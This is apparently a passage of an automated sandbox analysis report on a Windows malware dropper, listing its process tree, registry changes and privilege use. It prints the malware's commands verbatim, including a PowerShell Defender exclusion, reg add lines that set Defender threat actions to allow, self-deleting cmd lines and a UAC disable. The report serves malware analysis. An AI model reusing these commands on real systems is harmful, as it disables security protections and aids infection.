\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" mFHhzFD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d9c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" mFHhzFD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe -
Processes:
fileosn.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 fileosn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 fileosn.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exeaxplont.exeRegAsm.exesvhoost.exefileosn.exeOne.exepowershell.exeThdYwKZvKmIzn3rj3JtxK05A.exeSJLhmzYCwLH1f34kc7MVy0ZE.exeaxplont.exepowershell.exepowershell.exeAddInProcess32.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exemFHhzFD.exepid process 4508 62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe 4508 62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe 2068 axplont.exe 2068 axplont.exe 4592 RegAsm.exe 4592 RegAsm.exe 756 svhoost.exe 756 svhoost.exe 5116 fileosn.exe 5116 fileosn.exe 436 One.exe 436 One.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 1840 ThdYwKZvKmIzn3rj3JtxK05A.exe 1840 ThdYwKZvKmIzn3rj3JtxK05A.exe 1840 ThdYwKZvKmIzn3rj3JtxK05A.exe 1840 ThdYwKZvKmIzn3rj3JtxK05A.exe 936 SJLhmzYCwLH1f34kc7MVy0ZE.exe 936 SJLhmzYCwLH1f34kc7MVy0ZE.exe 936 SJLhmzYCwLH1f34kc7MVy0ZE.exe 756 svhoost.exe 756 svhoost.exe 756 svhoost.exe 756 svhoost.exe 5116 fileosn.exe 5116 fileosn.exe 5116 fileosn.exe 5116 fileosn.exe 3296 axplont.exe 3296 axplont.exe 3700 powershell.exe 3700 powershell.exe 3700 powershell.exe 2900 powershell.exe 2900 powershell.exe 2900 powershell.exe 3208 AddInProcess32.exe 3208 AddInProcess32.exe 3208 AddInProcess32.exe 2152 powershell.exe 2152 powershell.exe 2152 powershell.exe 3260 powershell.exe 3260 powershell.exe 3260 powershell.exe 3736 powershell.exe 3736 powershell.exe 3736 powershell.exe 3288 powershell.EXE 3288 powershell.EXE 3288 powershell.EXE 1676 powershell.exe 1676 powershell.exe 1676 powershell.exe 2776 mFHhzFD.exe 2776 mFHhzFD.exe 2776 mFHhzFD.exe 2776 mFHhzFD.exe 2776 mFHhzFD.exe 2776 mFHhzFD.exe 2776 mFHhzFD.exe 2776 mFHhzFD.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
One.exefile300un.exesvhoost.exefileosn.exeCasPol.exepowershell.exeThdYwKZvKmIzn3rj3JtxK05A.exeSJLhmzYCwLH1f34kc7MVy0ZE.exeRegAsm.exepowershell.exeAddInProcess32.exepowershell.exeWMIC.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exedescription pid process Token: SeDebugPrivilege 436 One.exe Token: SeBackupPrivilege 436 One.exe Token: SeSecurityPrivilege 436 One.exe Token: SeSecurityPrivilege 436 One.exe Token: SeSecurityPrivilege 436 One.exe Token: SeSecurityPrivilege 436 One.exe Token: SeDebugPrivilege 3508 file300un.exe Token: SeDebugPrivilege 756 svhoost.exe Token: SeDebugPrivilege 5116 fileosn.exe Token: SeDebugPrivilege 3256 CasPol.exe Token: SeDebugPrivilege 2544 powershell.exe Token: SeManageVolumePrivilege 1840 ThdYwKZvKmIzn3rj3JtxK05A.exe Token: SeDebugPrivilege 936 SJLhmzYCwLH1f34kc7MVy0ZE.exe Token: SeDebugPrivilege 4548 RegAsm.exe Token: SeDebugPrivilege 3700 powershell.exe Token: SeDebugPrivilege 3208 AddInProcess32.exe Token: SeDebugPrivilege 2900 powershell.exe Token: SeIncreaseQuotaPrivilege 3696 WMIC.exe Token: SeSecurityPrivilege 3696 WMIC.exe Token: SeTakeOwnershipPrivilege 3696 WMIC.exe Token: SeLoadDriverPrivilege 3696 WMIC.exe Token: SeSystemProfilePrivilege 3696 WMIC.exe Token: SeSystemtimePrivilege 3696 WMIC.exe Token: SeProfSingleProcessPrivilege 3696 WMIC.exe Token: SeIncBasePriorityPrivilege 3696 WMIC.exe Token: SeCreatePagefilePrivilege 3696 WMIC.exe Token: SeBackupPrivilege 3696 WMIC.exe Token: SeRestorePrivilege 3696 WMIC.exe Token: SeShutdownPrivilege 3696 WMIC.exe Token: SeDebugPrivilege 3696 WMIC.exe Token: SeSystemEnvironmentPrivilege 3696 WMIC.exe Token: SeRemoteShutdownPrivilege 3696 WMIC.exe Token: SeUndockPrivilege 3696 WMIC.exe Token: SeManageVolumePrivilege 3696 WMIC.exe Token: 33 3696 WMIC.exe Token: 34 3696 WMIC.exe Token: 35 3696 WMIC.exe Token: 36 3696 WMIC.exe Token: SeIncreaseQuotaPrivilege 3696 WMIC.exe Token: SeSecurityPrivilege 3696 WMIC.exe Token: SeTakeOwnershipPrivilege 3696 WMIC.exe Token: SeLoadDriverPrivilege 3696 WMIC.exe Token: SeSystemProfilePrivilege 3696 WMIC.exe Token: SeSystemtimePrivilege 3696 WMIC.exe Token: SeProfSingleProcessPrivilege 3696 WMIC.exe Token: SeIncBasePriorityPrivilege 3696 WMIC.exe Token: SeCreatePagefilePrivilege 3696 WMIC.exe Token: SeBackupPrivilege 3696 WMIC.exe Token: SeRestorePrivilege 3696 WMIC.exe Token: SeShutdownPrivilege 3696 WMIC.exe Token: SeDebugPrivilege 3696 WMIC.exe Token: SeSystemEnvironmentPrivilege 3696 WMIC.exe Token: SeRemoteShutdownPrivilege 3696 WMIC.exe Token: SeUndockPrivilege 3696 WMIC.exe Token: SeManageVolumePrivilege 3696 WMIC.exe Token: 33 3696 WMIC.exe Token: 34 3696 WMIC.exe Token: 35 3696 WMIC.exe Token: 36 3696 WMIC.exe Token: SeDebugPrivilege 2152 powershell.exe Token: SeDebugPrivilege 3260 powershell.exe Token: SeDebugPrivilege 3736 powershell.exe Token: SeDebugPrivilege 3288 powershell.EXE Token: SeDebugPrivilege 1676 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
6gOQA073DOsYkG6b0EgvvAcd.exepid process 1432 6gOQA073DOsYkG6b0EgvvAcd.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
6gOQA073DOsYkG6b0EgvvAcd.exepid process 1432 6gOQA073DOsYkG6b0EgvvAcd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exeaxplont.exe33333.exeRegAsm.exegold.exeswizzzz.exeRegAsm.execmd.exefile300un.exedescription pid process target process PID 4508 wrote to memory of 2068 4508 62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe axplont.exe PID 4508 wrote to memory of 2068 4508 62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe axplont.exe PID 4508 wrote to memory of 2068 4508 62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe axplont.exe PID 2068 wrote to memory of 1428 2068 axplont.exe 33333.exe PID 2068 wrote to memory of 1428 2068 axplont.exe 33333.exe PID 2068 wrote to memory of 1428 2068 axplont.exe 33333.exe PID 1428 wrote to memory of 4548 1428 33333.exe RegAsm.exe PID 1428 wrote to memory of 4548 1428 33333.exe RegAsm.exe PID 1428 wrote to memory of 4548 1428 33333.exe RegAsm.exe PID 1428 wrote to memory of 4548 1428 33333.exe RegAsm.exe PID 1428 wrote to memory of 4548 1428 33333.exe RegAsm.exe PID 1428 wrote to memory of 4548 1428 33333.exe RegAsm.exe PID 1428 wrote to memory of 4548 1428 33333.exe RegAsm.exe PID 1428 wrote to memory of 4548 1428 33333.exe RegAsm.exe PID 2068 wrote to memory of 5116 2068 axplont.exe fileosn.exe PID 2068 wrote to memory of 5116 2068 axplont.exe fileosn.exe PID 2068 wrote to memory of 5116 2068 axplont.exe fileosn.exe PID 4548 wrote to memory of 436 4548 RegAsm.exe One.exe PID 4548 wrote to memory of 436 4548 RegAsm.exe One.exe PID 4548 wrote to memory of 756 4548 RegAsm.exe svhoost.exe PID 4548 wrote to memory of 756 4548 RegAsm.exe svhoost.exe PID 4548 wrote to memory of 756 4548 RegAsm.exe svhoost.exe PID 2068 wrote to memory of 3224 2068 axplont.exe lumma1234.exe PID 2068 wrote to memory of 3224 2068 axplont.exe lumma1234.exe PID 2068 wrote to memory of 3224 2068 axplont.exe lumma1234.exe PID 2068 wrote to memory of 4508 2068 axplont.exe gold.exe PID 2068 wrote to memory of 4508 2068 axplont.exe gold.exe PID 2068 wrote to memory of 4508 2068 axplont.exe gold.exe PID 4508 wrote to memory of 696 4508 gold.exe RegAsm.exe PID 4508 wrote to memory of 696 4508 gold.exe RegAsm.exe PID 4508 wrote to memory of 696 4508 gold.exe RegAsm.exe PID 4508 wrote to memory of 696 4508 gold.exe RegAsm.exe PID 4508 wrote to memory of 696 4508 gold.exe RegAsm.exe PID 4508 wrote to memory of 696 4508 gold.exe RegAsm.exe PID 4508 wrote to memory of 696 4508 gold.exe RegAsm.exe PID 4508 wrote to memory of 696 4508 gold.exe RegAsm.exe PID 4508 wrote to memory of 696 4508 gold.exe RegAsm.exe PID 2068 wrote to memory of 4928 2068 axplont.exe swizzzz.exe PID 2068 wrote to memory of 4928 2068 axplont.exe swizzzz.exe PID 2068 wrote to memory of 4928 2068 axplont.exe swizzzz.exe PID 4928 wrote to memory of 4356 4928 swizzzz.exe RegAsm.exe PID 4928 wrote to memory of 4356 4928 swizzzz.exe RegAsm.exe PID 4928 wrote to memory of 4356 4928 swizzzz.exe RegAsm.exe PID 4928 wrote to memory of 4592 4928 swizzzz.exe RegAsm.exe PID 4928 wrote to memory of 4592 4928 swizzzz.exe RegAsm.exe PID 4928 wrote to memory of 4592 4928 swizzzz.exe RegAsm.exe PID 4928 wrote to memory of 4592 4928 swizzzz.exe RegAsm.exe PID 4928 wrote to memory of 4592 4928 swizzzz.exe RegAsm.exe PID 4928 wrote to memory of 4592 4928 swizzzz.exe RegAsm.exe PID 4928 wrote to memory of 4592 4928 swizzzz.exe RegAsm.exe PID 4928 wrote to memory of 4592 4928 swizzzz.exe RegAsm.exe PID 4928 wrote to memory of 4592 4928 swizzzz.exe RegAsm.exe PID 2068 wrote to memory of 3508 2068 axplont.exe file300un.exe PID 2068 wrote to memory of 3508 2068 axplont.exe file300un.exe PID 4592 wrote to memory of 1432 4592 RegAsm.exe cmd.exe PID 4592 wrote to memory of 1432 4592 RegAsm.exe cmd.exe PID 4592 wrote to memory of 1432 4592 RegAsm.exe cmd.exe PID 1432 wrote to memory of 2720 1432 cmd.exe timeout.exe PID 1432 wrote to memory of 2720 1432 cmd.exe timeout.exe PID 1432 wrote to memory of 2720 1432 cmd.exe timeout.exe PID 3508 wrote to memory of 2544 3508 file300un.exe powershell.exe PID 3508 wrote to memory of 2544 3508 file300un.exe powershell.exe PID 3508 wrote to memory of 2396 3508 file300un.exe msbuild.exe PID 3508 wrote to memory of 2396 3508 file300un.exe msbuild.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
file300un.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe"C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"5⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 36⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 2764⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"3⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 2444⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Checks computer location settings
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /t 56⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"3⤵
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"4⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\ThdYwKZvKmIzn3rj3JtxK05A.exe"C:\Users\Admin\Pictures\ThdYwKZvKmIzn3rj3JtxK05A.exe" /s5⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\SJLhmzYCwLH1f34kc7MVy0ZE.exe"C:\Users\Admin\Pictures\SJLhmzYCwLH1f34kc7MVy0ZE.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"6⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe"C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe"5⤵
- Modifies firewall policy service
- Windows security bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\6gOQA073DOsYkG6b0EgvvAcd.exe"C:\Users\Admin\Pictures\6gOQA073DOsYkG6b0EgvvAcd.exe"5⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\Pictures\mmlrDdjIh8SWGrRHE0rDm0Rb.exe"C:\Users\Admin\Pictures\mmlrDdjIh8SWGrRHE0rDm0Rb.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSFE84.tmp\Install.exe.\Install.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exe.\Install.exe /NQHxdidUQs "385118" /S7⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"8⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 610⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 611⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 610⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 611⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 610⤵
-
